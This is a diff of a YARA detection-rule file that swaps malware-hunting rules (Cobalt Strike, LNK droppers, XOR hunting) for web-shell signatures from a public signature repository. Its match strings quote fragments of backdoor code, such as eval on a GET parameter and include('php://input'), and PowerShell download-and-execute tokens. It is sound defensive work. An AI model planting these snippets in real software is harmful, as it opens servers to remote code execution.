-		$s246 = { F6 F7 F6 F7 F6 F4 ?? ?? F6 F4 F6 F7 F6 F4 ?? ?? F6 F5 F6 F4 F6 F2 ?? ?? ?? ?? F6 F2 F6 F4 F6 F2 ?? ?? ?? ?? F6 F3 F6 F7 F6 F4 ?? ?? }
-		$s247 = { F7 F6 F7 F6 F7 F5 ?? ?? F7 F5 F7 F6 F7 F5 ?? ?? F7 F4 F7 F5 F7 F3 ?? ?? ?? ?? F7 F3 F7 F5 F7 F3 ?? ?? ?? ?? F7 F2 F7 F6 F7 F5 ?? ?? }
-		$s248 = { F8 F9 F8 F9 F8 FA ?? ?? F8 FA F8 F9 F8 FA ?? ?? F8 FB F8 FA F8 FC ?? ?? ?? ?? F8 FC F8 FA F8 FC ?? ?? ?? ?? F8 FD F8 F9 F8 FA ?? ?? }
-		$s249 = { F9 F8 F9 F8 F9 FB ?? ?? F9 FB F9 F8 F9 FB ?? ?? F9 FA F9 FB F9 FD ?? ?? ?? ?? F9 FD F9 FB F9 FD ?? ?? ?? ?? F9 FC F9 F8 F9 FB ?? ?? }
-		$s250 = { FA FB FA FB FA F8 ?? ?? FA F8 FA FB FA F8 ?? ?? FA F9 FA F8 FA FE ?? ?? ?? ?? FA FE FA F8 FA FE ?? ?? ?? ?? FA FF FA FB FA F8 ?? ?? }
-		$s251 = { FB FA FB FA FB F9 ?? ?? FB F9 FB FA FB F9 ?? ?? FB F8 FB F9 FB FF ?? ?? ?? ?? FB FF FB F9 FB FF ?? ?? ?? ?? FB FE FB FA FB F9 ?? ?? }
-		$s252 = { FC FD FC FD FC FE ?? ?? FC FE FC FD FC FE ?? ?? FC FF FC FE FC F8 ?? ?? ?? ?? FC F8 FC FE FC F8 ?? ?? ?? ?? FC F9 FC FD FC FE ?? ?? }
-		$s253 = { FD FC FD FC FD FF ?? ?? FD FF FD FC FD FF ?? ?? FD FE FD FF FD F9 ?? ?? ?? ?? FD F9 FD FF FD F9 ?? ?? ?? ?? FD F8 FD FC FD FF ?? ?? }
-		$s254 = { FE FF FE FF FE FC ?? ?? FE FC FE FF FE FC ?? ?? FE FD FE FC FE FA ?? ?? ?? ?? FE FA FE FC FE FA ?? ?? ?? ?? FE FB FE FF FE FC ?? ?? }
-		$s255 = { FF FE FF FE FF FD ?? ?? FF FD FF FE FF FD ?? ?? FF FC FF FD FF FB ?? ?? ?? ?? FF FB FF FD FF FB ?? ?? ?? ?? FF FA FF FE FF FD ?? ?? }
-		$fp1 = "ICSharpCode.Decompiler" wide
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L996-L1013"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "124b22f38aaaf064cef14711b2602c06"
+		logic_hash = "dfe3ac097de4ca406ab7ec967fdc03d1e87c74f84fc675b58438a842d80cccda"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "kXpeW[\"" fullword
+		$s4 = "[7b:g0W@W<" fullword
+		$s5 = "b:gHr,g<" fullword
+		$s8 = "RhV0W@W<" fullword
+		$s9 = "S_MR(u7b" fullword
 
 	condition:
-		any of ( $s* ) and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_MZ_Launcher
+rule SIGNATURE_BASE_Webshell_ASP_Zehir4
 {
 	meta:
-		description = "Detects CobaltStrike MZ header ReflectiveLoader launcher"
-		author = "yara@s3c.za.net"
-		id = "461a4741-11c5-53d9-b8e1-52d64cfe755b"
-		date = "2021-07-08"
-		modified = "2023-12-05"
+		description = "Web Shell - file zehir4.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike_evasive.yar#L297-L307"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1014-L1027"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aa188546db138dffdcdbf6538367b5d5bc37638a2784b24b7fcd913c15e56072"
-		score = 75
+		hash = "7f4e12e159360743ec016273c3b9108c"
+		logic_hash = "aa3e07ee6369dd5f86f28a53c8e45391de718d4935021339a7b47829b5196f54"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$mz_launcher = { 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D }
+		$s9 = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/"
 
 	condition:
-		$mz_launcher
+		all of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_Unmodifed_Beacon
+rule SIGNATURE_BASE_Webshell_Wsb_Idc
 {
 	meta:
-		description = "Detects unmodified CobaltStrike beacon DLL"
-		author = "yara@s3c.za.net"
-		id = "8eeb03f9-9698-5a46-b45b-224d5c3f3df7"
-		date = "2019-08-16"
-		modified = "2023-12-05"
+		description = "Web Shell - file idc.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike_evasive.yar#L309-L320"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1028-L1042"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "10114a431fb70be8e18e67b22aa76bf2c0536f07d373f717c1dc51755e0847c9"
-		score = 75
+		hash = "7c5b1b30196c51f1accbffb80296395f"
+		logic_hash = "f274061f1a02ab65bc574a6586343f74262a463c5200cd2c231a752f54967404"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$loader_export = "ReflectiveLoader"
-		$exportname = "beacon.dll"
+		$s1 = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword
+		$s3 = "{eval($_GET['idc']);}" fullword
+
+	condition:
+		1 of them
+}
+rule SIGNATURE_BASE_Webshell_Cpg_143_Incl_Xpl
+{
+	meta:
+		description = "Web Shell - file cpg_143_incl_xpl.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1043-L1057"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "5937b131b67d8e0afdbd589251a5e176"
+		logic_hash = "7c2ce25c33e167761d72331d7c4d4f7cd6029ee0caf6e2008df8b12894faaaf8"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA"
+		$s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time"
+
+	condition:
+		1 of them
+}
+rule SIGNATURE_BASE_Webshell_Mumaasp_Com
+{
+	meta:
+		description = "Web Shell - file mumaasp.com.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1058-L1071"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "cce32b2e18f5357c85b6d20f564ebd5d"
+		logic_hash = "75e2a056782190e9914264b9e34002faea75a35ab0f97bf1e05dec15432d064c"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_SUSP_Xored_Mozilla_Oct19
+rule SIGNATURE_BASE_Webshell_Php_404
 {
 	meta:
-		description = "Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key."
-		author = "Florian Roth"
-		id = "71e5b399-c384-5330-ae52-4e0a806e7969"
-		date = "2019-10-28"
-		modified = "2023-11-03"
-		old_rule_name = "SUSP_XORed_Mozilla"
-		reference = "https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force()"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xor_hunting.yar#L2-L25"
+		description = "Web Shell - file 404.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1072-L1085"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e1b5c7a0adb4dc65cdf0a653255ac865a0ecebbf1ff08b7fc46d510d5e8aa6c9"
-		score = 60
+		hash = "ced050df5ca42064056a7ad610a191b3"
+		logic_hash = "3fc928e6edda8fdc4220f57215db61b7fbf8de5b00423b219a173c8ecde40b79"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xo1 = "Mozilla/5.0" xor ascii wide
-		$xof1 = "Mozilla/5.0" ascii wide
-		$fpa1 = "Sentinel Labs" wide
-		$fpa2 = "<filter object at" ascii
-		$fpb1 = { 64 65 78 0a 30 33 35 }
+		$s0 = "$pass = md5(md5(md5($pass)));" fullword
 
 	condition:
-		$xo1 and not $xof1 and not 1 of ( $fpa* ) and not $fpb1 at 0
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Xored_MSDOS_Stub_Message : FILE
+rule SIGNATURE_BASE_Webshell_Webshell_Cnseay_X
 {
 	meta:
-		description = "Detects suspicious XORed MSDOS stub message"
-		author = "Florian Roth"
-		id = "9ab52434-9162-5fd5-bf34-8b163f6aeec4"
-		date = "2019-10-28"
-		modified = "2023-10-11"
-		reference = "https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xor_hunting.yar#L27-L56"
+		description = "Web Shell - file webshell-cnseay-x.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1086-L1099"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b6d7d7242511d2c26122fe2b880cfe39facb5f68ae45e19c1558163f0427c304"
-		score = 55
+		hash = "a0f9f7f5cd405a514a7f3be329f380e5"
+		logic_hash = "59cb8b8a5873b716a25096c7b12f09293a812b63f31fea07d919b9c4d2bc9a19"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xo1 = "This program cannot be run in DOS mode" xor(0x01-0xff) ascii wide
-		$xo2 = "This program must be run under Win32" xor(0x01-0xff) ascii wide
-		$fp1 = "AVAST Software" fullword wide ascii
-		$fp2 = "AVG Netherlands" fullword wide ascii
-		$fp3 = "AVG Technologies" ascii wide
-		$fp4 = "Malicious Software Removal Tool" wide
-		$fp5 = "McAfee Labs" fullword ascii wide
-		$fp6 = "Kaspersky Lab" fullword ascii wide
-		$fp7 = "<propertiesmap>" ascii wide
-		$fp10 = "Avira Engine Module" wide
-		$fp11 = "syntevo GmbH" wide fullword
-		$fp13 = "SophosClean" ascii
-		$fp14 = "SophosHomeClean" wide
+		$s9 = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_"
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* ) and not uint16( 0 ) == 0xb0b0 and not uint16( 0 ) == 0x5953
+		all of them
 }
-rule SIGNATURE_BASE_SNOWGLOBE_Babar_Malware : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Up
 {
 	meta:
-		description = "Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe"
+		description = "Web Shell - file up.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "53a61065-a3b3-563e-8ecc-513d8da68085"
-		date = "2015-02-18"
-		modified = "2023-12-05"
-		reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_snowglobe_babar.yar#L4-L37"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1100-L1114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "27a0a98053f3eed82a51cdefbdfec7bb948e1f36"
-		logic_hash = "a93425a95efe471b815e2daf0b5e290b3472b722c6a48f8c22f0a6e9c588ffc9"
-		score = 80
+		hash = "f775e721cfe85019fe41c34f47c0d67c"
+		logic_hash = "dff2896d2226ade08e74147121a0e0036e8545dfff36b48b5a0771c9c7d537e9"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$z0 = "admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper" ascii fullword
-		$z1 = "User-Agent: Mozilla/4.0 (compatible; MSI 6.0;" ascii fullword
-		$z2 = "ExecQueryFailled!" fullword ascii
-		$z3 = "NBOT_COMMAND_LINE" fullword
-		$z4 = "!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]" fullword
-		$s1 = "/s /n %s \"%s\"" fullword ascii
-		$s2 = "%%WINDIR%%\\%s\\%s" fullword ascii
-		$s3 = "/c start /wait " fullword ascii
-		$s4 = "(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)" ascii
-		$x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" ascii
-		$x2 = "%COMMON_APPDATA%" fullword ascii
-		$x4 = "CONOUT$" fullword ascii
-		$x5 = "cmd.exe" fullword ascii
-		$x6 = "DLLPATH" fullword ascii
+		$s0 = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio"
+		$s1 = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1MB and ( ( 1 of ( $z* ) and 1 of ( $x* ) ) or ( 3 of ( $s* ) and 4 of ( $x* ) ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Bluenoroffpos_DLL
+rule SIGNATURE_BASE_Webshell_Phpkit_0_1A_Odd
 {
 	meta:
-		description = "Bluenoroff POS malware - hkp.dll"
-		author = "Florian Roth"
-		id = "d2b34b50-c7eb-5852-ba5d-734dd5038c2e"
-		date = "2018-06-07"
-		modified = "2023-12-05"
-		reference = "http://blog.trex.re.kr/3?category=737685"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_bluenoroff_pos.yar#L2-L20"
+		description = "Web Shell - file odd.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1115-L1131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "39f23045b3e5ef60c199091b7f01ac2a3a31bcb95219aebb9a4cfd0764886f19"
-		score = 75
-		quality = 73
+		hash = "3c30399e7480c09276f412271f60ed01"
+		logic_hash = "745734658ed4000e1399531ae44125f8462ecd37388e6223cfa9bf91dbb52bbc"
+		score = 70
+		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$dll = "ksnetadsl.dll" ascii wide fullword nocase
-		$exe = "xplatform.exe" ascii wide fullword nocase
-		$agent = "Nimo Software HTTP Retriever 1.0" ascii wide nocase
-		$log_file = "c:\\windows\\temp\\log.tmp" ascii wide nocase
-		$base_addr = "%d-BaseAddr:0x%x" ascii wide nocase
-		$func_addr = "%d-FuncAddr:0x%x" ascii wide nocase
-		$HF_S = "HF-S(%d)" ascii wide
-		$HF_T = "HF-T(%d)" ascii wide
+		$s1 = "include('php://input');" fullword
+		$s3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+		$s4 = "// uses include('php://input') to execute arbritary code" fullword
+		$s5 = "// php://input based backdoor" fullword
 
 	condition:
-		5 of them
+		2 of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_Lnkfileoverrfc : FILE
+rule SIGNATURE_BASE_Webshell_ASP_Cmd
 {
 	meta:
-		description = "Detects APT lnk files that run double extraction and launch routines with autoruns"
-		author = "@Grotezinfosec, modified by Florian Roth"
-		id = "19c393af-ff7c-5345-a3ef-c06372344baf"
-		date = "2018-09-18"
-		modified = "2023-12-05"
+		description = "Web Shell - file cmd.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_lnk_files.yar#L2-L18"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1132-L1145"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "52ff949a17039c1fa5707ff503aa1a96b3925bdfef01867c9b59a8d72493a84e"
-		score = 65
+		hash = "97af88b478422067f23b001dd06d56a9"
+		logic_hash = "c1353e43876e18f18638a558a29a12d6e82603641fedd81b042adca91fea0d18"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$command = "C:\\Windows\\System32\\cmd.exe" fullword ascii
-		$command2 = {2F 00 63 00 20 00 66 00 69 00 6E 00 64 00 73 00 74 00 72}
-		$base64 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD" ascii
-		$cert = " -decode " ascii
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
 
 	condition:
-		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and filesize > 15KB and ( 2 of them )
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_Suspiciouscommands : FILE
+rule SIGNATURE_BASE_Webshell_PHP_Shell_X3
 {
 	meta:
-		description = "Detects LNK file with suspicious content"
+		description = "Web Shell - file PHP Shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8bfb1322-8e33-50bc-a389-2d8bdfec9ca7"
-		date = "2018-09-18"
-		modified = "2023-12-05"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_lnk_files.yar#L20-L51"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1146-L1161"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a0380927ebc89e46f9138e01f154113c5e23680cea9b117b47406003ea565c1e"
-		score = 60
-		quality = 81
-		tags = "FILE"
+		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
+		logic_hash = "7361a7eecf345b9c1809294b6b081db8769805ec3e6c656adc4ac87261193683"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = " -decode " ascii wide
-		$s2 = " -enc " ascii wide
-		$s3 = " -w hidden " ascii wide
-		$s4 = " -ep bypass " ascii wide
-		$s5 = " -noni " ascii nocase wide
-		$s7 = " -noprofile " ascii wide
-		$s8 = ".DownloadString(" ascii wide
-		$s9 = ".DownloadFile(" ascii wide
-		$s10 = "IEX(" ascii wide
-		$s11 = "iex(" ascii wide
-		$s12 = "WScript.shell" ascii wide fullword nocase
-		$s13 = " -nop " ascii wide
-		$s14 = "&tasklist>"
-		$s15 = "setlocal EnableExtensions DisableDelayedExpansion"
-		$s16 = "echo^ set^"
-		$s17 = "del /f /q "
-		$s18 = " echo | start "
-		$s19 = "&& echo "
-		$s20 = "&&set "
-		$s21 = "%&&@echo off "
+		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
+		$s6 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
+		$s9 = "if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset("
 
 	condition:
-		uint16( 0 ) == 0x004c and 1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_SUSP_DOC_LNK_In_ZIP : FILE
+rule SIGNATURE_BASE_Webshell_PHP_G00Nv13
 {
 	meta:
-		description = "Detects suspicious .doc.lnk file in ZIP archive"
+		description = "Web Shell - file g00nv13.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9c140d02-3b18-5faf-bb1d-2eb5c07a23dc"
-		date = "2019-07-02"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/RedDrip7/status/1145877272945025029"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_lnk_files.yar#L53-L66"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1162-L1176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ef4cdaad05af12f210aa6324a1e34a42843f814c59fb0085ac18370917ad4866"
-		score = 50
+		hash = "35ad2533192fe8a1a76c3276140db820"
+		logic_hash = "dd9f03a7ad0d2b73f7a8602ab267e0e8e5cb1f9250f9a25c86ded3797df2f8d5"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "7ea4f77cac557044e72a8e280372a2abe072f2ad98b5a4fbed4e2229e780173a"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = ".doc.lnk" fullword ascii
+		$s1 = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas"
+		$s4 = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p"
 
 	condition:
-		uint16( 0 ) == 0x4b50 and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Hunting_Rule_Shikataganai
+rule SIGNATURE_BASE_Webshell_Php_H6Ss
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Steven Miller"
-		id = "fe266a42-0480-5a98-9368-8a18aa5e4f69"
-		date = "2019-10-21"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_shikataganai.yar#L1-L22"
+		description = "Web Shell - file h6ss.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1177-L1190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "733522cb1d61f4bbb300d73ff21d9d7d10a78aae06e03408fce4b88e4c51f662"
-		score = 50
+		hash = "272dde9a4a7265d6c139287560328cd5"
+		logic_hash = "c4001be111ff271335dd65c15c59da979a8e202bcf58a7f10de7f03644472153"
+		score = 70
 		quality = 85
 		tags = ""
-		company = "FireEye"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$varInitializeAndXorCondition1_XorEAX = { B8 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
-		$varInitializeAndXorCondition1_XorEBP = { BD ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
-		$varInitializeAndXorCondition1_XorEBX = { BB ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
-		$varInitializeAndXorCondition1_XorECX = { B9 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
-		$varInitializeAndXorCondition1_XorEDI = { BF ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
-		$varInitializeAndXorCondition1_XorEDX = { BA ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
-		$varInitializeAndXorCondition2_XorEAX = { D9 74 24 F4 [0-30] B8 ?? ?? ?? ?? [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
-		$varInitializeAndXorCondition2_XorEBP = { D9 74 24 F4 [0-30] BD ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
-		$varInitializeAndXorCondition2_XorEBX = { D9 74 24 F4 [0-30] BB ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
-		$varInitializeAndXorCondition2_XorECX = { D9 74 24 F4 [0-30] B9 ?? ?? ?? ?? [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
